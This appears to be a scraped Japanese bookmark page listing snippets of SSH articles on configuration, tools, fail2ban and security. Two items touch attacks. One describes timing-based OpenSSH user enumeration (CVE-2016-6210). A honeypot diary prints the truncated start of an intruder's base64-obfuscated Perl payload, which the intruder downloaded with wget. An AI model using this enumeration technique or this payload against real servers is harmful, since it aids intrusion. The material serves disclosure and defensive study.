opensshでユーザの存在を確認できる脆弱性(CVE-2016-6210) - てきとうなメモ
Full Disclosure: opensshd - user enumeration When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter response time fro
RSA鍵、証明書のファイルフォーマットについて - Qiita
RSAの公開鍵暗号技術を利用するためには、鍵や証明書のファイルを扱う必要があるため、そのファイルフォーマットについて理解しておく必要があります。 実際、いろんな拡張子が登場するので、それぞれの意味を理解していないとすぐにわけがわからなくなります。そんなときのために備忘録をまとめてみました。 ファイルの拡張子の注意点 .DERと .PEMという拡張子は鍵の中身じゃなくて、エンコーディングを表している デジタル暗号化鍵やデジタル証明書はバイナリデータなのですが、MD5のハッシュ値のような単なる 値 ではなく、データ構造をもっています。.DERや .PEMはそのデータ構造をどういうフォーマットでエンコードしているかを表しています。そのため、.DERや.PEMという拡張子からそのファイルが何を表しているのかはわかりません。暗号化鍵の場合もあるし、証明書の場合もあります。 .DER 鍵や証明書をAS
github の IP アドレスをまとめて known_hosts に登録する — KaoriYa
$ git pull -p Warning: Permanently added the RSA host key for IP address '192.30.253.112' to the list of known hosts. この警告メッセージは ~/.ssh/known_hosts に github.com として IP アドレスが追加登録されたことを意味します。初回にはフィンガープリントの追加が確認されますが、2回め以降は IP アドレスの追加だけが行われます。しかもけっこう頻繁にでますよね。 そのうち github が使ってる全てのIPアドレスが登録されれば、このメッセージは出なくなると推測されますが、この記事によると 192.30.252.0/22 で 1024 個もあるんですね。~/.ssh/known_hosts も汚れるし、そんなの耐えられるかってーのw ということ
CentOS7での fail2banのインストールと設定方法(with firewalld) - Qiita
fail2banとは、SSH等の不正アクセス(ログイン失敗)を検知し、一定時間そのIPアドレスからのアクセスをブロックするソフトである。 通常、fail2banは単体では使用せず、ファイアウォールソフト(iptablesやfirewalld)ともに使用する。この記事では、firewalldを使用する。 また、先述したしたようにSSH以外の不正アクセス対策に使用することもできるが、今回の記事ではSSHの設定に限定した。 ※この記事は、2015年11月現在の最新版のfail2ban、CentOS(7.1.1503)にもとづいて記述されている。VPSホスティングサービス等によっては初期インストール状態が違うため、下記の手順があてはまらない場合があるかもしれないことをご承知おき願いたい。 epel-releaseリポジトリをインストールしていない場合、先にインストールする
Why aren’t we using SSH for everything? | shazow.net
SSH, how does it even? A few weeks ago, I wrote ssh-chat. ssh http://t.co/E7Ilc0B0BC pic.twitter.com/CqYBR1WYO4 — Andrey 🦃 Petrov (@shazow) December 13, 2014 The idea is simple: You open your terminal and type, $ ssh chat.shazow.net Unlike many others, you might stop yourself before typing “ls” and notice — that’s no shell, it’s a chat room! While the little details sink in, it dawns on you that
sshd再起動時にssh接続が継続する動作について | ギークを目指して
Linux/Unixサーバにsshしている際、sshdを再起動したとする。 sshdは一度終了する訳だから、現在接続しているsshも切断されるかと思いきや、接続は継続する。 今まであまり気にしていなかったけど、この振る舞いについて調べてみた。 先ず、現象の確認から 対象サーバにssh接続し、sshdを再起動してみる。 $ ssh ryozo@192.168.56.12 # 対象サーバに接続 $ hostname centos1.example.jp $ sudo service sshd restart sshd を停止中: [ OK ] sshd を起動中: [ OK ] $ hostname centos1.example.jp sshdは一度停止されているにもかかわらず、対象サーバからは切断されていない。 プロセス構造から理由を探る sshdプロセスの構成 先ず、sshdプロセスの構
sshした先に.bashrcや.vimrcを持って行きたい人のためのsshrc - Qiita
いろんなサーバーにsshしてちょろっと設定を確認したりするときってあると思います。 ただその時にllがつかえなかったり、vimのタブが空白4つがいいのに8文字分の広さのtab文字だったりして、ちょっとずつストレスが溜まっていきます。 やっぱりserverfaultでもおなじ苦労をしている人がいました。 vim - How to bring .vimrc around when I SSH? - Server Fault http://serverfault.com/questions/33423/how-to-bring-vimrc-around-when-i-ssh ただここにあるようにdotfilesとして保存して先でcloneするのもとても面倒くさい。第一各サーバーへ変更を入れないといけないし。SSHの秘密鍵みたいに携えていきたい。 そこで探していたらsshrcというツールを見つけて
Windows用高機能sshクライアント Xshell - Qiita
追記:2016年4月よりライセンス形態が変更になりました https://www.netsarang.com/download/free_license.html 個人・家庭ユーザーは無償で使用できるようになりました。 Windows用sshクライアントで使い勝手のよいものはないかなと探していたのですが、海外のサイトの紹介で見つけたXshellというソフトウェアが高機能・高カスタマイズ性で使いやすかったので、紹介したいと思います。(日本語の紹介記事はたぶんこれが初めてかも) (ただし商用利用は有償です) 背景 Linuxサーバーの構築・管理が仕事 作業用Linuxサーバーにsshでログインしてから作業 Cygwin上から管理サーバーにsshログインすることもあり これまで使用したWindows用sshクライアント Poderosa 4.3.8b (メイン) Cygwinのsshクライアント
sshのラッパーコマンドを作った - オープンソースこねこね
GoでSSHコマンドに便利機能を追加したコマンドを作りました。 2017/04/11 追記: この記事の内容は古くなっています! 2017/04/11時点の最新の仕様は、次の記事を参照してください SSHラッパーコマンドEsshのv1.0.0をリリースしました - オープンソースこねこね 追記ここまで。以下は2015/11時点の古い情報となります。 github.com 機能として Luaで~/.ssh/configに相当する設定を書ける。 zshの補完機能を使って、接続先一覧を出す。 サーバ接続時にフックを仕込める。自分はスクリーンの色を変えるの使っている。 複数のリモートサーバにまとめてコマンドを実行する。 といったところです。詳細はリポジトリのREADMEを見ていだければと思います。 ビルド済みバイナリをリリースページにおいてあるので、インストールはダウンロードして解凍してパスの通っ
websec-room.com - websec room リソースおよび情報
This webpage was generated by the domain owner using Sedo Domain Parking. Disclaimer: Sedo maintains no relationship with third party advertisers. Reference to any specific service or trade mark is not controlled by Sedo nor does it constitute or imply its association, endorsement or recommendation.
Microsoft、OpenSSH for Windowsのプレリリース版を公開 | スラド
MicrosoftがOpenSSHをWindows向けに移植した「OpenSSH for Windows」のプレリリース版を公開した(Windows PowerShell Blog)。GitHubのリリースページからコンパイル済みバイナリが入手できる。 本バージョンはOpenSSH 7.1p1をベースにしているとのことで、配布アーカイブにはssh.exeおよびsshd.exe、ssh-keygen.exe、sftp.exe、sftp-server.exeが含まれている。早速試して見たが、利用前にアーカイブに含まれている「setup-ssh-lsa.cmd」を管理者権限で実行してDLLファイルをインストールしておく必要があるようだ。また、コマンドプロンプト上では正しく動かず、Windows PowerShell上から実行する必要があった。 UNIX系マシンにリモートログインするだけならとりあ
ssh経由のSOCKSプロキシを通じてMac上のGoogle Chromeでブラウジング
自分用メモ。 SOCKSとは 汎用UNIX socketプロキシみたいなヤツ。WikipediaのSOCKS記事を参照。つか今までぜんぜん存在知らなかった。ヤバい。 OpenSSHのクライアントは、SOCKSによるダイナミックポートフォワーディングをサポートしている。あたかもssh先のサーバからsocket通信しているかのようにできる。 特定のIPアドレスからしか閲覧できないWebサイトをWebブラウザから閲覧したい場合がある。squidみたいなHTTP proxyを立てたり、VPNのソフトウェアを入れなくても、sshを通じたSOCKSだけで、そういったWebサイトを閲覧することができる。 OpenSSHでの接続方法 -DでSOCKSとしてListenするポート番号を指定できる。1080が慣習のようですがなんでもよい。-fでbackground実行、-Nでremote commandを実行
最強のSSH踏み台設定 - Qiita
追記:openssh-7.3 以降なら ProxyJump や -J が使えます ホスト名を + で繋げることで多段Proxy接続も簡単に、がコンセプトだった本エントリの設定ですが、OpenSSH 7.3 から ProxyJump という設定が使えるようになったので、使えるなら ProxyJump を使う方が健全だし柔軟で使い勝手も良いのでそちらを覚えて帰ることをオススメします。 使い方は簡単で以下のような感じです。多段も行けるし、踏み台ホスト毎にユーザ名やポート番号を変えることも出来ます。 # 1. bastion.example.jp -> internal.example.jp ssh -J bastion.example.jp internal.example.jp # 2. bastion.example.jp -> internal.example.jp -> super-de
sshのポートをデフォルトの22/tcpから変えるべきか論争に、終止符を打ちました - ろば電子が詰まつてゐる
また間が開きましたが、すみだセキュリティ勉強会2015#2を開催しました。発表していただいた@inaz2さん、@yasulibさん、ありがとうございました。当日の発表資料は上記の勉強会ブログからリンクしています。 今回の私の発表は、「攻撃を『隠す』・攻撃から『隠れる』」。ポートスキャンをするとsshが100個現れる「ssh分身の術」がメイン(?)です。 当初は、パケットヘッダやプロトコルのすき間にメッセージを隠したり、ファイルを隠すなども考えていたのですが……。あまりに盛りだくさんになりそうだったので、「ポートスキャンをいかに隠れて実行するか・ポートスキャンからどうやって隠れるか」と、ポートスキャンとnmapに絞って発表しました。 発表資料 私の発表資料は以下です。 (PDF)攻撃を「隠す」、攻撃から「隠れる」 発表ノート付きなのでPDFです。以下、落穂ひろいなど。 スキャンするポート数と
OpenSSH 日本語マニュアルページ
Last Modified: Sat Oct 15 04:04:06 UTC 2016 OpenSSH 公式サイト (英語のみ) 現在の日本語版マニュアルの最新バージョンは 7.3p1 です。 (2016/10/15) 翻訳用 GitHub はこちら。 OpenSSH 7.3p1 用 マニュアルページ (HTML) ssh(1) - rlogin/rsh ライクの基本的なクライアントプログラム。 ssh_config(5) - ssh クライアント設定ファイルの説明。 sshd(8) - ログインするためのデーモン。 sshd_config(5) - sshd デーモン設定ファイルの説明。 ssh-agent(1) - 秘密鍵を保持するための認証エージェント。 ssh-add(1) - 認証エージェントに鍵を登録するツール。 scp(1) - rcp(1) に似たファイルコピープログラム。
SSH不正侵入、観察日記
不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
GitHub - 9seconds/concierge: Ladies and gentlemen: maintainable SSH configs
OpenSSHに重大バグ
https://mrtc0.github.io/slides/ltdd-16-ssh-auth.html
GitHubが安全性に問題のあるSSH鍵を無効化
